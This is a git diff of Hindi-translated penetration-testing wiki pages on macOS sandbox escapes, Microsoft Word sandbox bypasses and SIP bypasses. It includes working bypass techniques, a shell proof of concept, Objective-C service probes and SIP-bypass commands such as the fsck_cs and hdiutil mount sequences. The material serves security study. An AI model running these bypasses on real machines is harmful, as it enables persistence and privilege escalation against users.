फिर, **`libSystem.B`** अन्य कई फ़ंक्शनों को कॉल करेगा जब तक कि **`xpc_pipe_routine`** ऐप के अधिकारों को **`securityd`** को नहीं भेजता। Securityd यह जांचता है कि क्या प्रक्रिया को सैंडबॉक्स के अंदर क्वारंटाइन किया जाना चाहिए, और यदि हां, तो इसे क्वारंटाइन किया जाएगा।\
अंत में, सैंडबॉक्स को **`__sandbox_ms`** को कॉल करके सक्रिय किया जाएगा, जो **`__mac_syscall`** को कॉल करेगा।
## Possible Bypasses
@ -19,16 +19,16 @@
**सैंडबॉक्स किए गए प्रक्रियाओं द्वारा बनाए गए फ़ाइलों** में **क्वारंटाइन विशेषता** जोड़ी जाती है ताकि सैंडबॉक्स से बचा जा सके। हालाँकि, यदि आप **क्वारंटाइन विशेषता के बिना एक `.app` फ़ोल्डर बनाने में सफल होते हैं** सैंडबॉक्स किए गए एप्लिकेशन के भीतर, तो आप ऐप बंडल बाइनरी को **`/bin/bash`** की ओर इंगित कर सकते हैं और **plist** में कुछ env वेरिएबल जोड़ सकते हैं ताकि **`open`** का दुरुपयोग करके **नए ऐप को बिना सैंडबॉक्स के लॉन्च किया जा सके**
यह वही है जो [**CVE-2023-32364**](https://gergelykalman.com/CVE-2023-32364-a-macOS-sandbox-escape-by-mounting.html)** में किया गया था।**
यह वही किया गया था [**CVE-2023-32364**](https://gergelykalman.com/CVE-2023-32364-a-macOS-sandbox-escape-by-mounting.html)**.**
> [!CAUTION]
> इसलिए, इस समय, यदि आप केवल **`.app`** के नाम के साथ एक फ़ोल्डर बनाने में सक्षम हैं जिसमें क्वारंटाइन विशेषता नहीं है, तो आप सैंडबॉक्स से बच सकते हैं क्योंकि macOS केवल **`.app` फ़ोल्डर** और **मुख्य निष्पादन योग्य** में **क्वारंटाइन** विशेषता की **जांच** करता है (और हम मुख्य निष्पादन योग्य को **`/bin/bash`** की ओर इंगित करेंगे)।
> इसलिए, इस समय, यदि आप केवल **`.app`** के नाम के साथ एक फ़ोल्डर बनाने में सक्षम हैं जिसमें क्वारंटाइन विशेषता नहीं है, तो आप सैंडबॉक्स से बच सकते हैं क्योंकि macOS केवल **`.app` फ़ोल्डर** और **मुख्य निष्पादन योग्य** में **क्वारंटाइन** विशेषता की **जांच करता है** (और हम मुख्य निष्पादन योग्य को **`/bin/bash`** की ओर इंगित करेंगे)।
>
> ध्यान दें कि यदि एक .app बंडल को पहले से चलाने के लिए अधिकृत किया गया है (इसमें चलाने के लिए अधिकृत झंडा के साथ क्वारंटाइन एक्सट्र है), तो आप इसका भी दुरुपयोग कर सकते हैं... सिवाय इसके कि अब आप **`.app`** बंडलों के अंदर लिख नहीं सकते जब तक कि आपके पास कुछ विशेषाधिकार प्राप्त TCC अनुमतियाँ न हों (जो आपको उच्च सैंडबॉक्स के अंदर नहीं मिलेंगी)।
### Abusing Open functionality
[**शब्द सैंडबॉक्स बायपास के अंतिम उदाहरणों**](macos-office-sandbox-bypasses.md#word-sandbox-bypass-via-login-items-and-.zshenv) में देखा जा सकता है कि **`open`** CLI कार्यक्षमता का दुरुपयोग कैसे किया जा सकता है ताकि सैंडबॉक्स को बायपास किया जा सके
[**शब्द सैंडबॉक्स बायपास के अंतिम उदाहरणों**](macos-office-sandbox-bypasses.md#word-sandbox-bypass-via-login-items-and-.zshenv) में देखा जा सकता है कि **`open`** CLI कार्यक्षमता का दुरुपयोग कैसे किया जा सकता है सैंडबॉक्स को बायपास करने के लिए
{{#ref}}
macos-office-sandbox-bypasses.md
@ -37,15 +37,15 @@ macos-office-sandbox-bypasses.md
### Launch Agents/Daemons
यहां तक कि यदि एक एप्लिकेशन **सैंडबॉक्स किया जाना है** (`com.apple.security.app-sandbox`), तो इसे सैंडबॉक्स को बायपास करने के लिए **एक LaunchAgent से निष्पादित किया जा सकता है** (`~/Library/LaunchAgents`) उदाहरण के लिए।\
जैसा कि [**इस पोस्ट**](https://www.vicarius.io/vsociety/posts/cve-2023-26818-sandbox-macos-tcc-bypass-w-telegram-using-dylib-injection-part-2-3?q=CVE-2023-26818) में समझाया गया है, यदि आप एक सैंडबॉक्स किए गए एप्लिकेशन के साथ स्थिरता प्राप्त करना चाहते हैं, तो आप इसे स्वचालित रूप से एक LaunchAgent के रूप में निष्पादित कर सकते हैं और शायद DyLib पर्यावरण चर के माध्यम से दुर्भावनापूर्ण कोड इंजेक्ट कर सकते हैं।
जैसा कि [**इस पोस्ट में**](https://www.vicarius.io/vsociety/posts/cve-2023-26818-sandbox-macos-tcc-bypass-w-telegram-using-dylib-injection-part-2-3?q=CVE-2023-26818) समझाया गया है, यदि आप एक सैंडबॉक्स किए गए एप्लिकेशन के साथ स्थिरता प्राप्त करना चाहते हैं, तो आप इसे स्वचालित रूप से एक LaunchAgent के रूप में निष्पादित कर सकते हैं और शायद DyLib पर्यावरण चर के माध्यम से दुर्भावनापूर्ण कोड इंजेक्ट कर सकते हैं।
### Abusing Auto Start Locations
यदि एक सैंडबॉक्स प्रक्रिया **एक स्थान पर लिख सकती है** जहां **बाद में एक बिना सैंडबॉक्स एप्लिकेशन बाइनरी चलाने जा रहा है**, तो यह **सिर्फ वहां बाइनरी रखकर** बचने में सक्षम होगी। इस प्रकार के स्थानों का एक अच्छा उदाहरण `~/Library/LaunchAgents` या `/System/Library/LaunchDaemons` हैं।
यदि एक सैंडबॉक्स प्रक्रिया **लिख सकती है** एक स्थान पर जहां **बाद में एक बिना सैंडबॉक्स एप्लिकेशन बाइनरी चलाने जा रहा है**, तो यह **सिर्फ वहां बाइनरी रखकर** बचने में सक्षम होगी। इस प्रकार के स्थानों का एक अच्छा उदाहरण `~/Library/LaunchAgents` या `/System/Library/LaunchDaemons` हैं।
इसके लिए आपको **2 चरणों** की आवश्यकता हो सकती है: एक प्रक्रिया बनाने के लिए जिसमें **अधिक अनुमति वाला सैंडबॉक्स** (`file-read*`, `file-write*`) हो जो आपके कोड को निष्पादित करेगा जो वास्तव में एक स्थान पर लिखेगा जहां इसे **बिना सैंडबॉक्स के निष्पादित किया जाएगा**
स्वचालित प्रारंभ स्थानों के बारे में इस पृष्ठ की जांच करें:
इस पृष्ठ को **ऑटो स्टार्ट स्थानों** के बारे में देखें:
{{#ref}}
../../../../macos-auto-start-locations.md
@ -53,7 +53,7 @@ macos-office-sandbox-bypasses.md
### Abusing other processes
यदि आप तब सैंडबॉक्स प्रक्रिया से **कम प्रतिबंधात्मक सैंडबॉक्स (या कोई नहीं) में चल रहे अन्य प्रक्रियाओं को समझौता करने में सक्षम हैं**, तो आप उनके सैंडबॉक्स में भागने में सक्षम होंगे:
यदि आप तब सैंडबॉक्स प्रक्रिया से **अन्य प्रक्रियाओं से समझौता करने में सक्षम हैं** जो कम प्रतिबंधात्मक सैंडबॉक्स (या कोई नहीं) में चल रही हैं, तो आप उनके सैंडबॉक्स में भागने में सक्षम होंगे:
{{#ref}}
../../../macos-proces-abuse/
@ -61,9 +61,9 @@ macos-office-sandbox-bypasses.md
### Available System and User Mach services
सैंडबॉक्स कुछ निश्चित **Mach सेवाओं** के साथ XPC के माध्यम से संवाद करने की अनुमति भी देता है जो प्रोफ़ाइल `application.sb` में परिभाषित हैं। यदि आप इनमें से किसी सेवा का **दुरुपयोग** करने में सक्षम हैं, तो आप **सैंडबॉक्स से बचने** में सक्षम हो सकते हैं।
सैंडबॉक्स कुछ निश्चित **Mach सेवाओं** के साथ XPC के माध्यम से संवाद करने की अनुमति भी देता है जो प्रोफ़ाइल `application.sb` में परिभाषित हैं। यदि आप इनमें से किसी एक सेवा का **दुरुपयोग** करने में सक्षम हैं, तो आप **सैंडबॉक्स से बचने** में सक्षम हो सकते हैं।
जैसा कि [इस लेखन](https://jhftss.github.io/A-New-Era-of-macOS-Sandbox-Escapes/) में संकेत दिया गया है, Mach सेवाओं के बारे में जानकारी `/System/Library/xpc/launchd.plist` में संग्रहीत होती है। आप उस फ़ाइल के अंदर `<string>System</string>` और `<string>User</string>` की खोज करके सभी सिस्टम और उपयोगकर्ता Mach सेवाओं को पा सकते हैं।
जैसा कि [इस लेख में](https://jhftss.github.io/A-New-Era-of-macOS-Sandbox-Escapes/) संकेतित किया गया है, Mach सेवाओं के बारे में जानकारी `/System/Library/xpc/launchd.plist` में संग्रहीत होती है। आप उस फ़ाइल के अंदर `<string>System</string>` और `<string>User</string>` की खोज करके सभी सिस्टम और उपयोगकर्ता Mach सेवाओं को पा सकते हैं।
इसके अलावा, यह जांचना संभव है कि क्या एक Mach सेवा एक सैंडबॉक्स किए गए एप्लिकेशन के लिए उपलब्ध है `bootstrap_look_up` को कॉल करके:
```objectivec
@ -90,7 +90,7 @@ checkService(serviceName.UTF8String);
```
### उपलब्ध PID Mach सेवाएँ
इन Mach सेवाओं का पहले [इस लेख में सैंडबॉक्स से बाहर निकलने के लिए दुरुपयोग किया गया था](https://jhftss.github.io/A-New-Era-of-macOS-Sandbox-Escapes/)। उस समय, **एक एप्लिकेशन और इसके ढांचे द्वारा आवश्यक सभी XPC सेवाएँ** ऐप के PID डोमेन में दिखाई दे रही थीं (ये Mach सेवाएँ हैं जिनका `ServiceType` `Application` है)।
इन Mach सेवाओं का पहले [इस लेख में सैंडबॉक्स से बाहर निकलने के लिए दुरुपयोग किया गया था](https://jhftss.github.io/A-New-Era-of-macOS-Sandbox-Escapes/)। उस समय, **एक एप्लिकेशन और इसके फ्रेमवर्क द्वारा आवश्यक सभी XPC सेवाएँ** ऐप के PID डोमेन में दिखाई दे रही थीं (ये Mach सेवाएँ हैं जिनका `ServiceType` `Application` है)।
**एक PID डोमेन XPC सेवा से संपर्क करने के लिए**, इसे ऐप के अंदर एक पंक्ति के साथ पंजीकृत करना आवश्यक है:
```objectivec
@ -219,7 +219,7 @@ ld: dynamic executables or dylibs must link with libSystem.dylib for architectur
```
### Not inherited restrictions
जैसा कि **[इस लेख के बोनस](https://jhftss.github.io/A-New-Era-of-macOS-Sandbox-Escapes/)** में बताया गया है, एक सैंडबॉक्स प्रतिबंध जैसे:
जैसा कि **[इस लेख के बोनस](https://jhftss.github.io/A-New-Era-of-macOS-Sandbox-Escapes/)** में समझाया गया है, एक सैंडबॉक्स प्रतिबंध जैसे:
```
(version 1)
(allow default)
@ -232,7 +232,7 @@ echo '#!/bin/sh\n touch /tmp/sbx' > /tmp/poc.app/Contents/MacOS/poc
chmod +x /tmp/poc.app/Contents/MacOS/poc
open /tmp/poc.app
```
हालांकि, निश्चित रूप से, यह नया प्रक्रिया माता-पिता प्रक्रिया से अधिकार या विशेषाधिकार नहीं विरासत में लेग
हालांकि, निश्चित रूप से, यह नया प्रक्रिया माता-पिता प्रक्रिया से अधिकार या विशेषाधिकार नहीं विरासत में लेग
### अधिकार
@ -370,7 +370,7 @@ codesign -s <cert-name> --entitlements entitlements.xml sand
```
> [!CAUTION]
> ऐप **`~/Desktop/del.txt`** फ़ाइल को **पढ़ने** की कोशिश करेगा, जिसे **Sandbox अनुमति नहीं देगा**।\
> वहाँ एक फ़ाइल बनाएं क्योंकि एक बार Sandbox को बायपास करने के बाद, यह इसे पढ़ सकेगा:
> वहाँ एक फ़ाइल बनाएं क्योंकि एक बार Sandbox को बायपास किया गया, यह इसे पढ़ सकेगा:
>
> ```bash
> echo "Sandbox Bypassed" > ~/Desktop/del.txt

12
src/macos-hardening/macos-security-and-privilege-escalation/macos-security-protections/macos-sandbox/macos-sandbox-debug-and-bypass/macos-office-sandbox-bypasses.md
View File

@ -4,7 +4,7 @@
### Word Sandbox bypass via Launch Agents
यह एप्लिकेशन **`com.apple.security.temporary-exception.sbpl`** विशेषाधिकार का उपयोग करते हुए एक **कस्टम सैंडबॉक्स** का उपयोग करता है और यह कस्टम सैंडबॉक्स किसी भी स्थान पर फ़ाइलें लिखने की अनुमति देता है जब फ़ाइल का नाम `~$` से शुरू होता है: `(require-any (require-all (vnode-type REGULAR-FILE) (regex #"(^|/)~$[^/]+$")))`
यह एप्लिकेशन **`com.apple.security.temporary-exception.sbpl`** विशेषाधिकार का उपयोग करते हुए एक **कस्टम सैंडबॉक्स** का उपयोग करता है और यह कस्टम सैंडबॉक्स किसी भी स्थान पर फ़ाइलें लिखने की अनुमति देता है जब तक फ़ाइल का नाम `~$` से शुरू होता है: `(require-any (require-all (vnode-type REGULAR-FILE) (regex #"(^|/)~$[^/]+$")))`
इसलिए, बचने के लिए **`plist`** LaunchAgent को `~/Library/LaunchAgents/~$escape.plist` में लिखना आसान था।
@ -14,9 +14,9 @@
याद रखें कि पहले के बचाव से, Word किसी भी फ़ाइल को लिख सकता है जिसका नाम `~$` से शुरू होता है, हालांकि पिछले कमजोरियों के पैच के बाद `/Library/Application Scripts` या `/Library/LaunchAgents` में लिखना संभव नहीं था।
यह पता चला कि सैंडबॉक्स के भीतर एक **Login Item** (ऐप्स जो उपयोगकर्ता के लॉगिन करते समय निष्पादित होंगे) बनाना संभव है। हालाँकि, ये ऐप्स **तब तक निष्पादित नहीं होंगे** जब तक कि वे **नोटराइज्ड** न हों और इसमें **args जोड़ना संभव नहीं है** (इसलिए आप केवल **`bash`** का उपयोग करके एक रिवर्स शेल नहीं चला सकते)।
यह पता चला कि सैंडबॉक्स के भीतर एक **Login Item** (ऐप्स जो उपयोगकर्ता के लॉगिन करने पर निष्पादित होंगे) बनाना संभव है। हालाँकि, ये ऐप्स **तब तक निष्पादित नहीं होंगे** जब तक कि वे **नोटराइज्ड** न हों और इसमें **args जोड़ना संभव नहीं है** (इसलिए आप केवल **`bash`** का उपयोग करके एक रिवर्स शेल नहीं चला सकते)।
पिछले सैंडबॉक्स बायपास से, Microsoft ने `~/Library/LaunchAgents` में फ़ाइलें लिखने का विकल्प अक्षम कर दिया। हालाँकि, यह पता चला कि यदि आप **Login Item के रूप में एक zip फ़ाइल** रखते हैं तो `Archive Utility` इसे केवल अपने वर्तमान स्थान पर **unzip** करेगा। इसलिए, चूंकि डिफ़ॉल्ट रूप से `~/Library` से `LaunchAgents` फ़ोल्डर नहीं बनाया गया है, इसलिए **`LaunchAgents/~$escape.plist`** में एक plist को **zip करना** और **zip फ़ाइल को `~/Library` में रखना** संभव था ताकि जब इसे decompress किया जाए तो यह स्थायी गंतव्य तक पहुँच सके।
पिछले सैंडबॉक्स बायपास से, Microsoft ने `~/Library/LaunchAgents` में फ़ाइलें लिखने का विकल्प बंद कर दिया। हालाँकि, यह पता चला कि यदि आप **Login Item के रूप में एक zip फ़ाइल** रखते हैं तो `Archive Utility` इसे केवल अपने वर्तमान स्थान पर **unzip** करेगा। इसलिए, चूंकि डिफ़ॉल्ट रूप से `~/Library` से `LaunchAgents` फ़ोल्डर नहीं बनाया गया है, इसलिए **`LaunchAgents/~$escape.plist`** में एक plist को **zip करना** और **zip फ़ाइल को `~/Library` में रखना** संभव था ताकि जब इसे decompress किया जाए तो यह स्थायी गंतव्य तक पहुँच सके।
[**मूल रिपोर्ट यहाँ देखें**](https://objective-see.org/blog/blog_0x4B.html)。
@ -26,7 +26,7 @@
हालाँकि, पिछले तकनीक में एक सीमा थी, यदि फ़ोल्डर **`~/Library/LaunchAgents`** मौजूद है क्योंकि कुछ अन्य सॉफ़्टवेयर ने इसे बनाया है, तो यह विफल हो जाएगा। इसलिए इसके लिए एक अलग Login Items श्रृंखला खोजी गई।
एक हमलावर फ़ाइलें **`.bash_profile`** और **`.zshenv`** बना सकता है जिसमें निष्पादित करने के लिए पेलोड हो और फिर उन्हें zip कर सकता है और **विक्टिम** के उपयोगकर्ता फ़ोल्डर में **zip लिख सकता है**: **`~/~$escape.zip`**।
एक हमलावर फ़ाइलें **`.bash_profile`** और **`.zshenv`** बना सकता है जिसमें निष्पादित करने के लिए पेलोड हो और फिर उन्हें zip कर सकता है और **विक्टिम** के उपयोगकर्ता फ़ोल्डर में zip लिख सकता है: **`~/~$escape.zip`**।
फिर, zip फ़ाइल को **Login Items** में जोड़ें और फिर **`Terminal`** ऐप। जब उपयोगकर्ता फिर से लॉगिन करता है, तो zip फ़ाइल उपयोगकर्ता फ़ाइल में अनजिप हो जाएगी, **`.bash_profile`** और **`.zshenv`** को ओवरराइट करते हुए और इसलिए, टर्मिनल इनमें से एक फ़ाइल को निष्पादित करेगा (इस पर निर्भर करते हुए कि bash या zsh का उपयोग किया गया है)।
@ -36,7 +36,7 @@
सैंडबॉक्स किए गए प्रक्रियाओं से अन्य प्रक्रियाओं को **`open`** उपयोगिता का उपयोग करके बुलाना अभी भी संभव है। इसके अलावा, ये प्रक्रियाएँ **अपने स्वयं के सैंडबॉक्स** के भीतर चलेंगी।
यह पता चला कि open उपयोगिता में **`--env`** विकल्प है जिससे एक ऐप को **विशिष्ट env** वेरिएबल्स के साथ चलाया जा सकता है। इसलिए, यह संभव था कि **सैंडबॉक्स** के भीतर एक फ़ोल्डर में **`.zshenv` फ़ाइल** बनाई जाए और `open` का उपयोग `--env` के साथ **`HOME` वेरिएबल** को उस फ़ोल्डर में सेट किया जाए, जिससे `Terminal` ऐप खोला जाए, जो `.zshenv` फ़ाइल को निष्पादित करेगा (किसी कारण से `__OSINSTALL_ENVIROMENT` वेरिएबल को सेट करना भी आवश्यक था)।
यह पता चला कि open उपयोगिता में **`--env`** विकल्प है जिससे एक ऐप को **विशिष्ट env** वेरिएबल्स के साथ चलाया जा सकता है। इसलिए, यह संभव था कि **सैंडबॉक्स** के भीतर एक फ़ोल्डर में **`.zshenv` फ़ाइल** बनाई जाए और `open` का उपयोग `--env` के साथ उस फ़ोल्डर के लिए **`HOME` वेरिएबल** सेट किया जाए, जिससे `Terminal` ऐप खोला जाए, जो `.zshenv` फ़ाइल को निष्पादित करेगा (किसी कारण से `__OSINSTALL_ENVIROMENT` वेरिएबल सेट करना भी आवश्यक था)।
[**मूल रिपोर्ट यहाँ देखें**](https://perception-point.io/blog/technical-analysis-of-cve-2021-30864/)।
@ -44,7 +44,7 @@
**`open`** उपयोगिता ने **`--stdin`** पैरामीटर का भी समर्थन किया (और पिछले बायपास के बाद `--env` का उपयोग करना संभव नहीं था)।
बात यह है कि भले ही **`python`** Apple द्वारा साइन किया गया हो, यह **`quarantine`** विशेषता वाली स्क्रिप्ट को **निष्पादित नहीं करेगा**। हालाँकि, इसे stdin से एक स्क्रिप्ट पास करना संभव था ताकि यह न देखे कि यह क्वारंटाइन में था या नहीं:&#x20;
बात यह है कि भले ही **`python`** Apple द्वारा साइन किया गया हो, यह **`quarantine`** विशेषता वाली स्क्रिप्ट को **निष्पादित नहीं करेगा**। हालाँकि, इसे stdin से एक स्क्रिप्ट पास करना संभव था ताकि यह न चेक करे कि यह क्वारंटाइन में है या नहीं:&#x20;
1. एक **`~$exploit.py`** फ़ाइल छोड़ें जिसमें मनमाने Python कमांड हों।
2. _open_ **`stdin='~$exploit.py' -a Python`** चलाएँ, जो Python ऐप को हमारे छोड़े गए फ़ाइल के साथ उसके मानक इनपुट के रूप में चलाता है। Python खुशी-खुशी हमारे कोड को चलाता है, और चूंकि यह _launchd_ का एक चाइल्ड प्रोसेस है, यह Word के सैंडबॉक्स नियमों से बंधा नहीं है।

30
src/macos-hardening/macos-security-and-privilege-escalation/macos-security-protections/macos-sip.md
View File

@ -11,7 +11,7 @@
- **/sbin**
- **/usr**
SIP के व्यवहार को नियंत्रित करने वाले नियम उस कॉन्फ़िगरेशन फ़ाइल में परिभाषित होते हैं जो **`/System/Library/Sandbox/rootless.conf`** पर स्थित है। इस फ़ाइल के भीतर, उन पथों को जो एक तारांकित चिह्न (\*) से पूर्ववर्ती होते हैं, अन्यथा कठोर SIP प्रतिबंधों के लिए अपवाद के रूप में दर्शाया गया है।
SIP के व्यवहार को नियंत्रित करने वाले नियम उस कॉन्फ़िगरेशन फ़ाइल में परिभाषित होते हैं जो **`/System/Library/Sandbox/rootless.conf`** पर स्थित है। इस फ़ाइल के भीतर, उन पथों को जो एक तारांकित चिह्न (\*) से पूर्ववर्ती होते हैं, अन्यथा कठोर SIP प्रतिबंधों के अपवाद के रूप में दर्शाया गया है।
नीचे दिए गए उदाहरण पर विचार करें:
```javascript
@ -34,7 +34,7 @@ drwxr-xr-x 11 root wheel sunlnk 352 May 13 00:29 /usr/libexec/cups
ls -lOd /usr/libexec
drwxr-xr-x 338 root wheel restricted 10816 May 13 00:29 /usr/libexec
```
यहाँ, **`restricted`** ध्वज इंगित करता है कि `/usr/libexec` निर्देशिका SIP द्वारा संरक्षित है। SIP-संरक्षित निर्देशिका में, फ़ाइलें बनाई, संशोधित या हटाई नहीं जा सकतीं।
यहाँ, **`restricted`** ध्वज इंगित करता है कि `/usr/libexec` निर्देशिका SIP द्वारा संरक्षित है। एक SIP-संरक्षित निर्देशिका में, फ़ाइलें बनाई, संशोधित या हटाई नहीं जा सकतीं।
इसके अलावा, यदि एक फ़ाइल में **`com.apple.rootless`** विस्तारित **attribute** है, तो वह फ़ाइल भी **SIP द्वारा संरक्षित** होगी।
@ -48,7 +48,7 @@ drwxr-xr-x 338 root wheel restricted 10816 May 13 00:29 /usr/libexec
- NVRAM चर को संशोधित करना
- कर्नेल डिबगिंग की अनुमति देना
विकल्प nvram चर में एक बिटफ्लैग के रूप में बनाए रखे जाते हैं (`csr-active-config` Intel पर और `lp-sip0` ARM के लिए बूट किए गए डिवाइस ट्री से पढ़ा जाता है)। आप XNU स्रोत कोड में `csr.sh` में ध्वज पा सकते हैं:
विकल्प nvram चर में एक बिटफ्लैग के रूप में बनाए रखे जाते हैं (`csr-active-config` Intel पर और `lp-sip0` ARM के लिए बूट किए गए डिवाइस ट्री से पढ़ा जाता है)। आप `csr.sh` में XNU स्रोत कोड में ध्वज पा सकते हैं:
<figure><img src="../../../images/image (1192).png" alt=""><figcaption></figcaption></figure>
@ -112,21 +112,21 @@ SIP को बायपास करने से एक हमलावर क
#### [CVE-2019-8561](https://objective-see.org/blog/blog_0x42.html) <a href="#cve" id="cve"></a>
यह पता चला कि **सिस्टम द्वारा इसके कोड** हस्ताक्षर की पुष्टि करने के बाद इंस्टॉलर पैकेज को **स्वैप करना संभव था** और फिर, सिस्टम मूल के बजाय दुर्भावनापूर्ण पैकेज स्थापित करेगा। चूंकि ये क्रियाएँ **`system_installd`** द्वारा की गई थीं, यह SIP को बायपास करने की अनुमति देगा।
यह पता चला कि **`system_installd`** द्वारा कोड हस्ताक्षर की सत्यापन के बाद इंस्टॉलर पैकेज को **स्वैप करना संभव था** और फिर, सिस्टम मूल पैकेज के बजाय दुर्भावनापूर्ण पैकेज स्थापित करेगा। चूंकि ये क्रियाएँ **`system_installd`** द्वारा की गई थीं, यह SIP को बायपास करने की अनुमति देगा।
#### [CVE-20209854](https://objective-see.org/blog/blog_0x4D.html) <a href="#cve-unauthd-chain" id="cve-unauthd-chain"></a>
यदि एक पैकेज एक माउंटेड इमेज या बाहरी ड्राइव से स्थापित किया गया था तो **इंस्टॉलर** **उस फ़ाइल प्रणाली** से बाइनरी को **निष्पादित** करेगा (SIP-सुरक्षित स्थान से नहीं), जिससे **`system_installd`** एक मनमाना बाइनरी निष्पादित करेगा।
यदि एक पैकेज एक माउंटेड इमेज या बाहरी ड्राइव से स्थापित किया गया था, तो **इंस्टॉलर** उस फ़ाइल प्रणाली से बाइनरी को **निष्पादित** करेगा (SIP-सुरक्षित स्थान से नहीं), जिससे **`system_installd`** एक मनमाना बाइनरी निष्पादित करेगा।
#### CVE-2021-30892 - Shrootless
[**इस ब्लॉग पोस्ट के शोधकर्ताओं**](https://www.microsoft.com/en-us/security/blog/2021/10/28/microsoft-finds-new-macos-vulnerability-shrootless-that-could-bypass-system-integrity-protection/) ने macOS के सिस्टम इंटीग्रिटी प्रोटेक्शन (SIP) तंत्र में एक भेद्यता का पता लगाया, जिसे 'Shrootless' भेद्यता कहा गया। यह भेद्यता **`system_installd`** डेमन के चारों ओर केंद्रित है, जिसमें एक अधिकार है, **`com.apple.rootless.install.heritable`**, जो इसके किसी भी चाइल्ड प्रोसेस को SIP की फ़ाइल प्रणाली प्रतिबंधों को बायपास करने की अनुमति देता है।
[**इस ब्लॉग पोस्ट के शोधकर्ताओं**](https://www.microsoft.com/en-us/security/blog/2021/10/28/microsoft-finds-new-macos-vulnerability-shrootless-that-could-bypass-system-integrity-protection/) ने macOS के सिस्टम इंटीग्रिटी प्रोटेक्शन (SIP) तंत्र में एक भेद्यता का पता लगाया, जिसे 'Shrootless' भेद्यता कहा गया। यह भेद्यता **`system_installd`** डेमन के चारों ओर केंद्रित है, जिसमें एक अधिकार है, **`com.apple.rootless.install.heritable`**, जो इसके किसी भी बाल प्रक्रिया को SIP के फ़ाइल प्रणाली प्रतिबंधों को बायपास करने की अनुमति देता है।
**`system_installd`** डेमन उन पैकेजों को स्थापित करेगा जो **Apple** द्वारा हस्ताक्षरित हैं।
शोधकर्ताओं ने पाया कि Apple-साइन किए गए पैकेज (.pkg फ़ाइल) की स्थापना के दौरान, **`system_installd`** पैकेज में शामिल किसी भी **पोस्ट-इंस्टॉल** स्क्रिप्ट को **निष्पादित** करता है। ये स्क्रिप्ट डिफ़ॉल्ट शेल, **`zsh`** द्वारा निष्पादित की जाती हैं, जो स्वचालित रूप से **`/etc/zshenv`** फ़ाइल से कमांड चलाती है, यदि यह मौजूद है, यहां तक कि गैर-इंटरएक्टिव मोड में भी। इस व्यवहार का हमलावरों द्वारा लाभ उठाया जा सकता है: एक दुर्भावनापूर्ण `/etc/zshenv` फ़ाइल बनाकर और **`system_installd` को `zsh`** को सक्रिय करने की प्रतीक्षा करके, वे डिवाइस पर मनमाने ऑपरेशन कर सकते हैं।
शोधकर्ताओं ने पाया कि Apple द्वारा हस्ताक्षरित पैकेज (.pkg फ़ाइल) की स्थापना के दौरान, **`system_installd`** पैकेज में शामिल किसी भी **पोस्ट-इंस्टॉल** स्क्रिप्ट को **निष्पादित** करता है। ये स्क्रिप्ट डिफ़ॉल्ट शेल, **`zsh`** द्वारा निष्पादित की जाती हैं, जो स्वचालित रूप से **`/etc/zshenv`** फ़ाइल से कमांड चलाती है, यदि यह मौजूद है, यहां तक कि गैर-इंटरएक्टिव मोड में भी। इस व्यवहार का हमलावरों द्वारा लाभ उठाया जा सकता है: एक दुर्भावनापूर्ण `/etc/zshenv` फ़ाइल बनाकर और **`system_installd` को `zsh`** को सक्रिय करने की प्रतीक्षा करके, वे डिवाइस पर मनमाने ऑपरेशन कर सकते हैं।
इसके अलावा, यह पता चला कि **`/etc/zshenv` को एक सामान्य हमले की तकनीक के रूप में उपयोग किया जा सकता है**, न कि केवल SIP बायपास के लिए। प्रत्येक उपयोगकर्ता प्रोफ़ाइल में एक `~/.zshenv` फ़ाइल होती है, जो `/etc/zshenv` की तरह ही व्यवहार करती है लेकिन रूट अनुमतियों की आवश्यकता नहीं होती। इस फ़ाइल का उपयोग एक स्थायीता तंत्र के रूप में किया जा सकता है, जो हर बार `zsh` शुरू होने पर ट्रिगर होता है, या विशेषाधिकार बढ़ाने के तंत्र के रूप में। यदि एक व्यवस्थापक उपयोगकर्ता `sudo -s` या `sudo <command>` का उपयोग करके रूट में बढ़ता है, तो `~/.zshenv` फ़ाइल ट्रिगर होगी, प्रभावी रूप से रूट में बढ़ते हुए।
इसके अलावा, यह पता चला कि **`/etc/zshenv` को एक सामान्य हमले की तकनीक के रूप में उपयोग किया जा सकता है**, न कि केवल SIP बायपास के लिए। प्रत्येक उपयोगकर्ता प्रोफ़ाइल में एक `~/.zshenv` फ़ाइल होती है, जो `/etc/zshenv` की तरह व्यवहार करती है लेकिन रूट अनुमतियों की आवश्यकता नहीं होती। इस फ़ाइल का उपयोग एक स्थायीता तंत्र के रूप में किया जा सकता है, जो हर बार `zsh` शुरू होने पर ट्रिगर होता है, या विशेषाधिकार बढ़ाने के तंत्र के रूप में। यदि एक व्यवस्थापक उपयोगकर्ता `sudo -s` या `sudo <command>` का उपयोग करके रूट में बढ़ता है, तो `~/.zshenv` फ़ाइल ट्रिगर होगी, प्रभावी रूप से रूट में बढ़ते हुए।
#### [**CVE-2022-22583**](https://perception-point.io/blog/technical-analysis-cve-2022-22583/)
@ -143,7 +143,7 @@ fsck_cs /dev/diskX 1>&-
touch /Library/Extensions/
reboot
```
इस कमजोरियों के शोषण के गंभीर परिणाम हैं। `Info.plist` फ़ाइल, जो सामान्यतः कर्नेल एक्सटेंशन के लिए अनुमतियों का प्रबंधन करने के लिए जिम्मेदार होती है, अप्रभावी हो जाती है। इसमें कुछ एक्सटेंशनों को ब्लैकलिस्ट करने की असमर्थता शामिल है, जैसे `AppleHWAccess.kext`। परिणामस्वरूप, SIP के नियंत्रण तंत्र के खराब होने के कारण, इस एक्सटेंशन को लोड किया जा सकता है, ज सिस्टम की RAM तक अनधिकृत पढ़ने और लिखने की पहुंच प्रदान करता है।
इस कमजोरियों के शोषण के गंभीर परिणाम हैं। `Info.plist` फ़ाइल, जो सामान्यतः कर्नेल एक्सटेंशन के लिए अनुमतियों का प्रबंधन करने के लिए जिम्मेदार होती है, अप्रभावी हो जाती है। इसमें कुछ एक्सटेंशनों, जैसे `AppleHWAccess.kext` को ब्लैकलिस्ट करने की असमर्थता शामिल है। परिणामस्वरूप, SIP के नियंत्रण तंत्र के खराब होने के कारण, इस एक्सटेंशन को लोड किया जा सकता है, जिससे सिस्टम की RAM तक अनधिकृत पढ़ने और लिखने की पहुंच मिलती है।
#### [SIP संरक्षित फ़ोल्डरों पर माउंट करें](https://www.slideshare.net/i0n1c/syscan360-stefan-esser-os-x-el-capitan-sinking-the-ship)
@ -162,13 +162,13 @@ hdiutil attach -mountpoint /System/Library/Snadbox/ evil.dmg
```
